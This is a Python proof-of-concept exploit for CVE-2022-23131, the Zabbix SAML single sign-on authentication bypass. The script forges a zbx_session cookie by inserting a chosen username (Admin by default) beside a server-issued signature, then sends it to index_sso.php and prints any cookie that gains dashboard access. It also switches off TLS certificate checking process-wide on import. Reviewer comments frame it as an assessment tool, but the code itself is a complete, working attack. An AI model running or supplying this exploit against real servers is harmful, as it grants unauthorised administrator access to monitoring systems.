CVE-2022-23131.py
# -*- coding: utf-8 -*-
# @Author : AD钙奶
import base64
import json
import re
import ssl
import sys
import urllib.parse
import argparse
import requests
# Process-wide TLS relaxation, applied as a side effect of importing this file.
# NOTE(review): this silences urllib3's warnings and replaces the stdlib's
# default HTTPS context factory with the unverified one, so certificate checks
# are switched off for stdlib HTTPS clients in the whole process, not just for
# the requests made below. Anything read over such a connection is
# unauthenticated; keep this confined to a throwaway assessment environment.
try:
    requests.packages.urllib3.disable_warnings()
    _create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
    # One of the attributes above is unavailable: leave the ssl defaults alone.
    pass
else:
    # Reached only when both lines in the try body succeeded.
    ssl._create_default_https_context = _create_unverified_https_context
def exp(target, username):
    """Fetch a session cookie from *target*, rewrite it, and pass it to ``_verify``.

    The ``zbx_session`` cookie handled here is URL-encoded, base64-encoded JSON
    that is held by the client. This function decodes the cookie returned to an
    unauthenticated GET, builds a new JSON object that adds
    ``saml_data.username_attribute`` set to *username* while copying the
    server-issued ``sessionid`` and ``sign`` values unchanged, and re-encodes
    the result in the same cookie format.

    A hit reported by ``_verify`` therefore means the server acted on a
    ``saml_data`` field supplied by the client alongside a ``sign`` value that
    was issued for a different cookie body (presumably the SSO path reads
    ``saml_data`` without checking it against the signature; confirm against
    the vendor advisory for CVE-2022-23131).

    Defender notes: the check only concerns installations that expose the SAML
    SSO endpoint; remediation is the vendor's fixed release for this CVE.

    Args:
        target: Base URL of the Zabbix frontend, e.g. ``http://ip:port``.
        username: Value placed in ``saml_data.username_attribute``.

    Returns:
        None. Every exception raised along the way is swallowed, so a network
        error, a missing cookie and a patched server all look the same to the
        caller: no output.
    """
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
    }
    try:
        # NOTE(review): verify=False means the TLS peer is not authenticated,
        # and no timeout is set, so an unresponsive host blocks indefinitely.
        response = requests.get(url=target, headers=request_headers, verify=False)
        set_cookie = response.headers.get("Set-Cookie")

        # First zbx_session value in the Set-Cookie header (must be followed by "; ").
        raw_session = re.findall(r"zbx_session=(.*?); ", set_cookie)[0]

        # Undo the cookie encoding: URL-decoding, then base64, then UTF-8 JSON.
        session_json = base64.b64decode(
            urllib.parse.unquote(raw_session, encoding='utf-8')
        ).decode('utf-8')
        session = json.loads(session_json)

        # Key order is kept as in the original script because it determines
        # the serialized bytes of the cookie.
        rewritten = {
            "saml_data": {"username_attribute": username},
            "sessionid": session["sessionid"],
            "sign": session["sign"],
        }
        encoded = base64.b64encode(json.dumps(rewritten).encode())
        payload = urllib.parse.quote(encoded)

        _verify(target, payload)
    except Exception:
        # NOTE(review): deliberate best-effort in the original; failures are
        # silent, which makes "not vulnerable" indistinguishable from "check
        # could not run". Do not treat an empty result as proof of a fix.
        pass
def _verify(url, payload):
    """Send *payload* as the ``zbx_session`` cookie to ``index_sso.php`` and report.

    The request does not follow redirects. The target is reported as affected
    only when the response is a 302 whose ``location`` header is exactly
    ``zabbix.php?action=dashboard.view``; any other response produces no output.

    Defender notes: the same request/response pair is what this check leaves
    in the web server's access log: a GET to ``index_sso.php`` answered with a
    redirect to the dashboard, likely without a preceding SAML exchange.
    The line printed on a hit contains a cookie the server has just accepted,
    so treat the tool's output as a credential when storing or sharing it.

    Args:
        url: Base URL of the Zabbix frontend (``/index_sso.php`` is appended).
        payload: Already URL-encoded cookie value produced by ``exp``.

    Returns:
        None. A 302 without a ``location`` header raises ``KeyError``.
    """
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
        "Cache-Control": "max-age=0",
        "Connection": "close",
        "Cookie": f"zbx_session={payload}",
    }
    url = f'{url}/index_sso.php'
    # NOTE(review): no timeout is set on this request.
    reqs = requests.get(url, headers=request_headers, allow_redirects=False)

    # Anything other than a redirect means the cookie was not honoured.
    if reqs.status_code != 302:
        return
    if reqs.headers['location'] != 'zabbix.php?action=dashboard.view':
        return
    print(f"[ * ] 存在CVE-2022-23131漏洞 {url}" + '\n' + "zbx_session:", payload)
def main():
    """Parse the command line and run the check against the given URL.

    Options:
        -u / --url: base URL of the frontend to check (``http://ip:port``).
        -a / --username: account name placed in the cookie; defaults to ``Admin``.

    When ``--url`` is omitted the function returns without doing anything.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument("-u", "--url", help="输入目标地址; Example:http://ip:port")
    cli.add_argument("-a", "--username", default='Admin', help="输入zabbix的用户名,默认为Admin")
    options = cli.parse_args()

    # No target supplied: nothing to check.
    if options.url is None:
        return
    exp(options.url, options.username)
# Script entry point: run the CLI only when executed directly, not on import.
if __name__ == '__main__':
    main()